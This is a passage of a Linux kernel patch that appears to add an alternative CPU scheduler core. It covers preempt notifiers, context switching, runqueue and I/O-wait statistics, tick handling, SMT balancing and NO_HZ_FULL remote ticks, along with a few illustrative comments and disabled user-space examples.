++	check_preempt_curr(rq);
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++
++static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
++
++void preempt_notifier_inc(void)
++{
++	static_branch_inc(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_inc);
++
++void preempt_notifier_dec(void)
++{
++	static_branch_dec(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_dec);
++
++/**
++ * preempt_notifier_register - tell me when current is being preempted & rescheduled
++ * @notifier: notifier struct to register
++ */
++void preempt_notifier_register(struct preempt_notifier *notifier)
++{
++	if (!static_branch_unlikely(&preempt_notifier_key))
++		WARN(1, "registering preempt_notifier while notifiers disabled\n");
++
++	hlist_add_head(&notifier->link, &current->preempt_notifiers);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_register);
++
++/**
++ * preempt_notifier_unregister - no longer interested in preemption notifications
++ * @notifier: notifier struct to unregister
++ *
++ * This is *not* safe to call from within a preemption notifier.
++ */
++void preempt_notifier_unregister(struct preempt_notifier *notifier)
++{
++	hlist_del(&notifier->link);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
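++
++/*
++ * Registration sketch (illustrative; my_ops/my_sched_in/my_sched_out
++ * are assumptions): a user that must save and restore per-CPU state
++ * around being scheduled out and back in would do:
++ *
++ *	static const struct preempt_notifier_ops my_ops = {
++ *		.sched_in  = my_sched_in,
++ *		.sched_out = my_sched_out,
++ *	};
++ *
++ *	preempt_notifier_inc();
++ *	preempt_notifier_init(&pn, &my_ops);
++ *	preempt_notifier_register(&pn);
++ *
++ * with a matching preempt_notifier_dec() after the final unregister.
++ */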
++
++static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_in(notifier, raw_smp_processor_id());
++}
++
++static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_in_preempt_notifiers(curr);
++}
++
++static void
++__fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				   struct task_struct *next)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_out(notifier, next);
++}
++
++static __always_inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_out_preempt_notifiers(curr, next);
++}
++
++#else /* !CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++}
++
++static inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++}
++
++#endif /* CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void prepare_task(struct task_struct *next)
++{
++	/*
++	 * Claim the task as running, we do this before switching to it
++	 * such that any running task will have this set.
++	 *
++	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
++	 * its ordering comment.
++	 */
++	WRITE_ONCE(next->on_cpu, 1);
++}
++
++static inline void finish_task(struct task_struct *prev)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * This must be the very last reference to @prev from this CPU. After
++	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
++	 * must ensure this doesn't happen until the switch is completely
++	 * finished.
++	 *
++	 * In particular, the load of prev->state in finish_task_switch() must
++	 * happen before this.
++	 *
++	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
++	 */
++	smp_store_release(&prev->on_cpu, 0);
++#else
++	prev->on_cpu = 0;
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	void (*func)(struct rq *rq);
++	struct balance_callback *next;
++
++	lockdep_assert_held(&rq->lock);
++
++	while (head) {
++		func = (void (*)(struct rq *))head->func;
++		next = head->next;
++		head->next = NULL;
++		head = next;
++
++		func(rq);
++	}
++}
++
++static void balance_push(struct rq *rq);
++
++/*
++ * balance_push_callback is a right abuse of the callback interface and plays
++ * by significantly different rules.
++ *
++ * Where the normal balance_callback's purpose is to be run in the same context
++ * that queued it (only later, when it's safe to drop rq->lock again),
++ * balance_push_callback is specifically targeted at __schedule().
++ *
++ * This abuse is tolerated because it places all the unlikely/odd cases behind
++ * a single test, namely: rq->balance_callback == NULL.
++ */
++struct balance_callback balance_push_callback = {
++	.next = NULL,
++	.func = balance_push,
++};
++
++static inline struct balance_callback *
++__splice_balance_callbacks(struct rq *rq, bool split)
++{
++	struct balance_callback *head = rq->balance_callback;
++
++	if (likely(!head))
++		return NULL;
++
++	lockdep_assert_rq_held(rq);
++	/*
++	 * Must not take balance_push_callback off the list when
++	 * splice_balance_callbacks() and balance_callbacks() are not
++	 * in the same rq->lock section.
++	 *
++	 * In that case it would be possible for __schedule() to interleave
++	 * and observe the list empty.
++	 */
++	if (split && head == &balance_push_callback)
++		head = NULL;
++	else
++		rq->balance_callback = NULL;
++
++	return head;
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return __splice_balance_callbacks(rq, true);
++}
++
++static void __balance_callbacks(struct rq *rq)
++{
++	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	unsigned long flags;
++
++	if (unlikely(head)) {
++		raw_spin_lock_irqsave(&rq->lock, flags);
++		do_balance_callbacks(rq, head);
++		raw_spin_unlock_irqrestore(&rq->lock, flags);
++	}
++}
++
++#else
++
++static inline void __balance_callbacks(struct rq *rq)
++{
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return NULL;
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++}
++
++#endif
++
++static inline void
++prepare_lock_switch(struct rq *rq, struct task_struct *next)
++{
++	/*
++	 * The runqueue lock will be released by the next
++	 * task (which is an invalid locking op, but in the case
++	 * of the scheduler it's an obvious special-case), so we
++	 * do an early lockdep release here:
++	 */
++	spin_release(&rq->lock.dep_map, _THIS_IP_);
++#ifdef CONFIG_DEBUG_SPINLOCK
++	/* this is a valid case when another task releases the spinlock */
++	rq->lock.owner = next;
++#endif
++}
++
++static inline void finish_lock_switch(struct rq *rq)
++{
++	/*
++	 * If we are tracking spinlock dependencies then we have to
++	 * fix up the runqueue lock - which gets 'carried over' from
++	 * prev into current:
++	 */
++	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
++	__balance_callbacks(rq);
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++/*
++ * NOP if the arch has not defined these:
++ */
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++static inline void kmap_local_sched_out(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_out();
++#endif
++}
++
++static inline void kmap_local_sched_in(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_in();
++#endif
++}
++
++/**
++ * prepare_task_switch - prepare to switch tasks
++ * @rq: the runqueue preparing to switch
++ * @next: the task we are going to switch to.
++ *
++ * This is called with the rq lock held and interrupts off. It must
++ * be paired with a subsequent finish_task_switch after the context
++ * switch.
++ *
++ * prepare_task_switch sets up locking and calls architecture specific
++ * hooks.
++ */
++static inline void
++prepare_task_switch(struct rq *rq, struct task_struct *prev,
++		    struct task_struct *next)
++{
++	kcov_prepare_switch(prev);
++	sched_info_switch(rq, prev, next);
++	perf_event_task_sched_out(prev, next);
++	rseq_preempt(prev);
++	fire_sched_out_preempt_notifiers(prev, next);
++	kmap_local_sched_out();
++	prepare_task(next);
++	prepare_arch_switch(next);
++}
++
++/**
++ * finish_task_switch - clean up after a task-switch
++ * @rq: runqueue associated with task-switch
++ * @prev: the thread we just switched away from.
++ *
++ * finish_task_switch must be called after the context switch, paired
++ * with a prepare_task_switch call before the context switch.
++ * finish_task_switch will reconcile locking set up by prepare_task_switch,
++ * and do any other architecture-specific cleanup actions.
++ *
++ * Note that we may have delayed dropping an mm in context_switch(). If
++ * so, we finish that here outside of the runqueue lock.  (Doing it
++ * with the lock held can cause deadlocks; see schedule() for
++ * details.)
++ *
++ * The context switch has flipped the stack from under us and restored the
++ * local variables which were saved when this task called schedule() in the
++ * past. prev == current is still correct but we need to recalculate this_rq
++ * because prev may have moved to another CPU.
++ */
++static struct rq *finish_task_switch(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	struct rq *rq = this_rq();
++	struct mm_struct *mm = rq->prev_mm;
++	unsigned int prev_state;
++
++	/*
++	 * The previous task will have left us with a preempt_count of 2
++	 * because it left us after:
++	 *
++	 *	schedule()
++	 *	  preempt_disable();			// 1
++	 *	  __schedule()
++	 *	    raw_spin_lock_irq(&rq->lock)	// 2
++	 *
++	 * Also, see FORK_PREEMPT_COUNT.
++	 */
++	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
++		      "corrupted preempt_count: %s/%d/0x%x\n",
++		      current->comm, current->pid, preempt_count()))
++		preempt_count_set(FORK_PREEMPT_COUNT);
++
++	rq->prev_mm = NULL;
++
++	/*
++	 * A task struct has one reference for the use as "current".
++	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
++	 * schedule one last time. The schedule call will never return, and
++	 * the scheduled task must drop that reference.
++	 *
++	 * We must observe prev->state before clearing prev->on_cpu (in
++	 * finish_task), otherwise a concurrent wakeup can get prev
++	 * running on another CPU and we could race with its RUNNING -> DEAD
++	 * transition, resulting in a double drop.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	vtime_task_switch(prev);
++	perf_event_task_sched_in(prev, current);
++	finish_task(prev);
++	tick_nohz_task_switch();
++	finish_lock_switch(rq);
++	finish_arch_post_lock_switch();
++	kcov_finish_switch(current);
++	/*
++	 * kmap_local_sched_out() is invoked with rq::lock held and
++	 * interrupts disabled. There is no requirement for that, but the
++	 * sched out code does not have an interrupt enabled section.
++	 * Restoring the maps on sched in does not require interrupts being
++	 * disabled either.
++	 */
++	kmap_local_sched_in();
++
++	fire_sched_in_preempt_notifiers(current);
++	/*
++	 * When switching through a kernel thread, the loop in
++	 * membarrier_{private,global}_expedited() may have observed that
++	 * kernel thread and not issued an IPI. It is therefore possible to
++	 * schedule between user->kernel->user threads without passing through
++	 * switch_mm(). Membarrier requires a barrier after storing to
++	 * rq->curr, before returning to userspace, so provide them here:
++	 *
++	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
++	 *   provided by mmdrop(),
++	 * - a sync_core for SYNC_CORE.
++	 */
++	if (mm) {
++		membarrier_mm_sync_core_before_usermode(mm);
++		mmdrop_sched(mm);
++	}
++	if (unlikely(prev_state == TASK_DEAD)) {
++		/* Task is done with its stack. */
++		put_task_stack(prev);
++
++		put_task_struct_rcu_user(prev);
++	}
++
++	return rq;
++}
++
++/**
++ * schedule_tail - first thing a freshly forked thread must call.
++ * @prev: the thread we just switched away from.
++ */
++asmlinkage __visible void schedule_tail(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	/*
++	 * New tasks start with FORK_PREEMPT_COUNT, see there and
++	 * finish_task_switch() for details.
++	 *
++	 * finish_task_switch() will drop rq->lock() and lower preempt_count
++	 * and the preempt_enable() will end up enabling preemption (on
++	 * PREEMPT_COUNT kernels).
++	 */
++
++	finish_task_switch(prev);
++	preempt_enable();
++
++	if (current->set_child_tid)
++		put_user(task_pid_vnr(current), current->set_child_tid);
++
++	calculate_sigpending();
++}
++
++/*
++ * context_switch - switch to the new MM and the new thread's register state.
++ */
++static __always_inline struct rq *
++context_switch(struct rq *rq, struct task_struct *prev,
++	       struct task_struct *next)
++{
++	prepare_task_switch(rq, prev, next);
++
++	/*
++	 * For paravirt, this is coupled with an exit in switch_to to
++	 * combine the page table reload and the switch backend into
++	 * one hypercall.
++	 */
++	arch_start_context_switch(prev);
++
++	/*
++	 * kernel -> kernel   lazy + transfer active
++	 *   user -> kernel   lazy + mmgrab() active
++	 *
++	 * kernel ->   user   switch + mmdrop() active
++	 *   user ->   user   switch
++	 */
++	if (!next->mm) {                                // to kernel
++		enter_lazy_tlb(prev->active_mm, next);
++
++		next->active_mm = prev->active_mm;
++		if (prev->mm)                           // from user
++			mmgrab(prev->active_mm);
++		else
++			prev->active_mm = NULL;
++	} else {                                        // to user
++		membarrier_switch_mm(rq, prev->active_mm, next->mm);
++		/*
++		 * sys_membarrier() requires an smp_mb() between setting
++		 * rq->curr / membarrier_switch_mm() and returning to userspace.
++		 *
++		 * The below provides this either through switch_mm(), or in
++		 * case 'prev->active_mm == next->mm' through
++		 * finish_task_switch()'s mmdrop().
++		 */
++		switch_mm_irqs_off(prev->active_mm, next->mm, next);
++		lru_gen_use_mm(next->mm);
++
++		if (!prev->mm) {                        // from kernel
++			/* will mmdrop() in finish_task_switch(). */
++			rq->prev_mm = prev->active_mm;
++			prev->active_mm = NULL;
++		}
++	}
++
++	prepare_lock_switch(rq, next);
++
++	/* Here we just switch the register state and the stack. */
++	switch_to(prev, next, prev);
++	barrier();
++
++	return finish_task_switch(prev);
++}
++
++/*
++ * nr_running, nr_uninterruptible and nr_context_switches:
++ *
++ * externally visible scheduler statistics: current number of runnable
++ * threads, total number of context switches performed since bootup.
++ */
++unsigned int nr_running(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_online_cpu(i)
++		sum += cpu_rq(i)->nr_running;
++
++	return sum;
++}
++
++/*
++ * Check if only the current task is running on the CPU.
++ *
++ * Caution: this function does not check that the caller has disabled
++ * preemption, thus the result might have a time-of-check-to-time-of-use
++ * race.  The caller is responsible for using it correctly, for example:
++ *
++ * - from a non-preemptible section (of course)
++ *
++ * - from a thread that is bound to a single CPU
++ *
++ * - in a loop with very short iterations (e.g. a polling loop)
++ */
++bool single_task_running(void)
++{
++	return raw_rq()->nr_running == 1;
++}
++EXPORT_SYMBOL(single_task_running);
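++
++/*
++ * Usage sketch (illustrative): a short polling loop that backs off as
++ * soon as another task becomes runnable on this CPU:
++ *
++ *	while (!event_arrived()) {
++ *		if (!single_task_running())
++ *			break;
++ *		cpu_relax();
++ *	}
++ *
++ * event_arrived() is an assumption for the example; KVM's halt-polling
++ * uses the same pattern.
++ */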
++
++unsigned long long nr_context_switches(void)
++{
++	int i;
++	unsigned long long sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += cpu_rq(i)->nr_switches;
++
++	return sum;
++}
++
++/*
++ * Consumers of these two interfaces, like for example the cpuidle menu
++ * governor, are using nonsensical data: they prefer shallow idle state
++ * selection for a CPU that has IO-wait, even though the task might not
++ * even end up running on that CPU when it does become runnable.
++ */
++
++unsigned int nr_iowait_cpu(int cpu)
++{
++	return atomic_read(&cpu_rq(cpu)->nr_iowait);
++}
++
++/*
++ * IO-wait accounting, and how it's mostly bollocks (on SMP).
++ *
++ * The idea behind IO-wait accounting is to account the idle time that we could
++ * have spent running if it were not for IO. That is, if we were to improve the
++ * storage performance, we'd have a proportional reduction in IO-wait time.
++ *
++ * This all works nicely on UP, where, when a task blocks on IO, we account
++ * idle time as IO-wait, because if the storage were faster, it could've been
++ * running and we'd not be idle.
++ *
++ * This has been extended to SMP, by doing the same for each CPU. This however
++ * is broken.
++ *
++ * Imagine for instance the case where two tasks block on one CPU; only that
++ * one CPU will have IO-wait accounted, while the other has regular idle. Even
++ * though, if the storage were faster, both could've run at the same time,
++ * utilising both CPUs.
++ *
++ * This means that, when looking globally, the current IO-wait accounting on
++ * SMP is a lower bound, by reason of under-accounting.
++ *
++ * Worse, since the numbers are provided per CPU, they are sometimes
++ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
++ * associated with any one particular CPU; it can wake up on a different CPU
++ * than the one it blocked on. This means the per-CPU IO-wait number is
++ * meaningless.
++ *
++ * Task CPU affinities can make all that even more 'interesting'.
++ */
++
++unsigned int nr_iowait(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += nr_iowait_cpu(i);
++
++	return sum;
++}
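++
++/*
++ * For illustration, nr_iowait() above is just the sum of the per-CPU
++ * counters, and per the comment that sum is only a lower bound. A minimal
++ * user-space sketch of the same summation, reading the iowait column (5th
++ * value) of the per-CPU lines in /proc/stat; the file format is the only
++ * assumption made here.
++ */
++#if 0	/* compile stand-alone: cc iowait_sum.c && ./a.out */
++#include <stdio.h>
++#include <string.h>
++
++int main(void)
++{
++	char line[512];
++	unsigned long long user, nice, sys, idle, iowait, total = 0;
++	FILE *f = fopen("/proc/stat", "r");
++
++	if (!f)
++		return 1;
++	while (fgets(line, sizeof(line), f)) {
++		/* per-CPU lines are "cpuN ..."; skip the aggregate "cpu " line */
++		if (strncmp(line, "cpu", 3) != 0 || line[3] == ' ')
++			continue;
++		if (sscanf(line, "%*s %llu %llu %llu %llu %llu",
++			   &user, &nice, &sys, &idle, &iowait) == 5)
++			total += iowait;
++	}
++	fclose(f);
++	/* Like nr_iowait(): a global lower bound, in clock ticks here. */
++	printf("summed iowait: %llu ticks\n", total);
++	return 0;
++}
++#endif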
++
++#ifdef CONFIG_SMP
++
++/*
++ * sched_exec - execve() is a valuable balancing opportunity, because at
++ * this point the task has the smallest effective memory and cache
++ * footprint.
++ */
++void sched_exec(void)
++{
++}
++
++#endif
++
++DEFINE_PER_CPU(struct kernel_stat, kstat);
++DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
++
++EXPORT_PER_CPU_SYMBOL(kstat);
++EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
++
++static inline void update_curr(struct rq *rq, struct task_struct *p)
++{
++	s64 ns = rq->clock_task - p->last_ran;
++
++	p->sched_time += ns;
++	cgroup_account_cputime(p, ns);
++	account_group_exec_runtime(p, ns);
++
++	p->time_slice -= ns;
++	p->last_ran = rq->clock_task;
++}
++
++/*
++ * Return the accounted runtime for the task.
++ * If the task is currently running, the result includes its pending
++ * runtime that has not been accounted yet.
++ */
++unsigned long long task_sched_runtime(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	u64 ns;
++
++#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
++	/*
++	 * 64-bit doesn't need locks to atomically read a 64-bit value.
++	 * So we have an optimization chance when the task's delta_exec is 0.
++	 * Reading ->on_cpu is racy, but this is ok.
++	 *
++	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
++	 * If we race with it entering CPU, unaccounted time is 0. This is
++	 * indistinguishable from the read occurring a few cycles earlier.
++	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
++	 * been accounted, so we're correct here as well.
++	 */
++	if (!p->on_cpu || !task_on_rq_queued(p))
++		return tsk_seruntime(p);
++#endif
++
++	rq = task_access_lock_irqsave(p, &lock, &flags);
++	/*
++	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
++	 * project cycles that may never be accounted to this
++	 * thread, breaking clock_gettime().
++	 */
++	if (p == rq->curr && task_on_rq_queued(p)) {
++		update_rq_clock(rq);
++		update_curr(rq, p);
++	}
++	ns = tsk_seruntime(p);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++	return ns;
++}
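++
++/*
++ * For illustration, task_sched_runtime() is what ultimately feeds
++ * clock_gettime(CLOCK_THREAD_CPUTIME_ID) for a live thread, which is why the
++ * pending (not yet accounted) runtime must be folded in. A minimal
++ * user-space probe:
++ */
++#if 0	/* compile stand-alone: cc runtime_probe.c && ./a.out */
++#include <stdio.h>
++#include <time.h>
++
++int main(void)
++{
++	struct timespec ts;
++	volatile unsigned long spin;
++
++	for (spin = 0; spin < 100000000UL; spin++)
++		;	/* burn some CPU so there is runtime to report */
++
++	if (clock_gettime(CLOCK_THREAD_CPUTIME_ID, &ts))
++		return 1;
++	/* Monotonically increasing even mid-timeslice, thanks to update_curr(). */
++	printf("thread runtime: %ld.%09ld s\n", (long)ts.tv_sec, ts.tv_nsec);
++	return 0;
++}
++#endif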
++
++/* This manages tasks that have run out of timeslice during a scheduler_tick */
++static inline void scheduler_task_tick(struct rq *rq)
++{
++	struct task_struct *p = rq->curr;
++
++	if (is_idle_task(p))
++		return;
++
++	update_curr(rq, p);
++	cpufreq_update_util(rq, 0);
++
++	/*
++	 * Tasks that have less than RESCHED_NS of time slice left will be
++	 * rescheduled.
++	 */
++	if (p->time_slice >= RESCHED_NS)
++		return;
++	set_tsk_need_resched(p);
++	set_preempt_need_resched();
++}
++
++#ifdef CONFIG_SCHED_DEBUG
++static u64 cpu_resched_latency(struct rq *rq)
++{
++	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
++	u64 resched_latency, now = rq_clock(rq);
++	static bool warned_once;
++
++	if (sysctl_resched_latency_warn_once && warned_once)
++		return 0;
++
++	if (!need_resched() || !latency_warn_ms)
++		return 0;
++
++	if (system_state == SYSTEM_BOOTING)
++		return 0;
++
++	if (!rq->last_seen_need_resched_ns) {
++		rq->last_seen_need_resched_ns = now;
++		rq->ticks_without_resched = 0;
++		return 0;
++	}
++
++	rq->ticks_without_resched++;
++	resched_latency = now - rq->last_seen_need_resched_ns;
++	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
++		return 0;
++
++	warned_once = true;
++
++	return resched_latency;
++}
++
++static int __init setup_resched_latency_warn_ms(char *str)
++{
++	long val;
++
++	if ((kstrtol(str, 0, &val))) {
++		pr_warn("Unable to set resched_latency_warn_ms\n");
++		return 1;
++	}
++
++	sysctl_resched_latency_warn_ms = val;
++	return 1;
++}
++__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
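++
++/*
++ * Usage example: together with the LATENCY_WARN scheduler feature, the
++ * threshold can be set on the kernel command line, e.g.:
++ *
++ *	resched_latency_warn_ms=100
++ *
++ * A value of 0 disables the warning, per the !latency_warn_ms check in
++ * cpu_resched_latency() above.
++ */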
++#else
++static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
++#endif /* CONFIG_SCHED_DEBUG */
++
++/*
++ * This function gets called by the timer code, with HZ frequency.
++ * We call it with interrupts disabled.
++ */
++void scheduler_tick(void)
++{
++	int cpu __maybe_unused = smp_processor_id();
++	struct rq *rq = cpu_rq(cpu);
++	u64 resched_latency;
++
++	arch_scale_freq_tick();
++	sched_clock_tick();
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	scheduler_task_tick(rq);
++	if (sched_feat(LATENCY_WARN))
++		resched_latency = cpu_resched_latency(rq);
++	calc_global_load_tick(rq);
++
++	rq->last_tick = rq->clock;
++	raw_spin_unlock(&rq->lock);
++
++	if (sched_feat(LATENCY_WARN) && resched_latency)
++		resched_latency_warn(cpu, resched_latency);
++
++	perf_event_task_tick();
++}
++
++#ifdef CONFIG_SCHED_SMT
++static inline int sg_balance_cpu_stop(void *data)
++{
++	struct rq *rq = this_rq();
++	struct task_struct *p = data;
++	cpumask_t tmp;
++	unsigned long flags;
++
++	local_irq_save(flags);
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++
++	rq->active_balance = 0;
++	/* _something_ may have changed the task, double check again */
++	if (task_on_rq_queued(p) && task_rq(p) == rq &&
++	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
++	    !is_migration_disabled(p)) {
++		int cpu = cpu_of(rq);
++		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
++		rq = move_queued_task(rq, p, dcpu);
++	}
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock(&p->pi_lock);
++
++	local_irq_restore(flags);
++
++	return 0;
++}
++
++/* sg_balance_trigger - trigger sibling group balance for @cpu */
++static inline int sg_balance_trigger(const int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	struct task_struct *curr;
++	int res;
++
++	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
++		return 0;
++	curr = rq->curr;
++	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&
++	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&
++	      !is_migration_disabled(curr) && (!rq->active_balance);
++
++	if (res)
++		rq->active_balance = 1;
++
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	if (res)
++		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
++				    &rq->active_balance_work);
++	return res;
++}
++
++/*
++ * sg_balance - sibling group balance check for run queue @rq
++ */
++static inline void sg_balance(struct rq *rq)
++{
++	cpumask_t chk;
++	int cpu = cpu_of(rq);
++
++	/* exit when cpu is offline */
++	if (unlikely(!rq->online))
++		return;
++
++	/*
++	 * Only a cpu in the sibling idle group will do the checking and then
++	 * find potential cpus which can migrate the currently running task
++	 */
++	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
++	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
++		int i;
++
++		for_each_cpu_wrap(i, &chk, cpu) {
++			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&
++			    sg_balance_trigger(i))
++				return;
++		}
++	}
++}
++#endif /* CONFIG_SCHED_SMT */
++
++#ifdef CONFIG_NO_HZ_FULL
++
++struct tick_work {
++	int			cpu;
++	atomic_t		state;
++	struct delayed_work	work;
++};
++/* Values for ->state, see diagram below. */
++#define TICK_SCHED_REMOTE_OFFLINE	0
++#define TICK_SCHED_REMOTE_OFFLINING	1
++#define TICK_SCHED_REMOTE_RUNNING	2
++
++/*
++ * State diagram for ->state:
++ *
++ *
++ *          TICK_SCHED_REMOTE_OFFLINE
++ *                    |   ^
++ *                    |   |
++ *                    |   | sched_tick_remote()
++ *                    |   |
++ *                    |   |
++ *                    +--TICK_SCHED_REMOTE_OFFLINING
++ *                    |   ^
++ *                    |   |
++ * sched_tick_start() |   | sched_tick_stop()
++ *                    |   |
++ *                    V   |
++ *          TICK_SCHED_REMOTE_RUNNING
++ *
++ *
++ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
++ * and sched_tick_start() are happy to leave the state in RUNNING.
++ */
++
++static struct tick_work __percpu *tick_work_cpu;
++
++static void sched_tick_remote(struct work_struct *work)
++{
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct tick_work *twork = container_of(dwork, struct tick_work, work);
++	int cpu = twork->cpu;
++	struct rq *rq = cpu_rq(cpu);
++	struct task_struct *curr;
++	unsigned long flags;
++	u64 delta;
++	int os;
++
++	/*
++	 * Handle the tick only if it appears the remote CPU is running in full
++	 * dynticks mode. The check is racy by nature, but missing a tick or
++	 * having one too many is no big deal because the scheduler tick updates
++	 * statistics and checks timeslices in a time-independent way, regardless
++	 * of when exactly it is running.
++	 */
++	if (!tick_nohz_tick_stopped_cpu(cpu))
++		goto out_requeue;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	curr = rq->curr;
++	if (cpu_is_offline(cpu))
++		goto out_unlock;
++
++	update_rq_clock(rq);
++	if (!is_idle_task(curr)) {
++		/*
++		 * Make sure the next tick runs within a reasonable
++		 * amount of time.
++		 */
++		delta = rq_clock_task(rq) - curr->last_ran;
++		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
++	}
++	scheduler_task_tick(rq);
++
++	calc_load_nohz_remote(rq);
++out_unlock:
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out_requeue:
++	/*
++	 * Run the remote tick once per second (1Hz). This arbitrary
++	 * frequency is large enough to avoid overload but short enough
++	 * to keep scheduler internal stats reasonably up to date.  But
++	 * first update state to reflect hotplug activity if required.
++	 */
++	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
++	if (os == TICK_SCHED_REMOTE_RUNNING)
++		queue_delayed_work(system_unbound_wq, dwork, HZ);
++}
++
++static void sched_tick_start(int cpu)
++{
++	int os;
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
++	if (os == TICK_SCHED_REMOTE_OFFLINE) {
++		twork->cpu = cpu;
++		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
++		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
++	}
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++static void sched_tick_stop(int cpu)
++{
++	struct tick_work *twork;
++	int os;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	/* There cannot be competing actions, but don't rely on stop-machine. */
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
++	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
++	/* Don't cancel, as this would mess up the state machine. */
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++int __init sched_tick_offload_init(void)
++{
++	tick_work_cpu = alloc_percpu(struct tick_work);
++	BUG_ON(!tick_work_cpu);
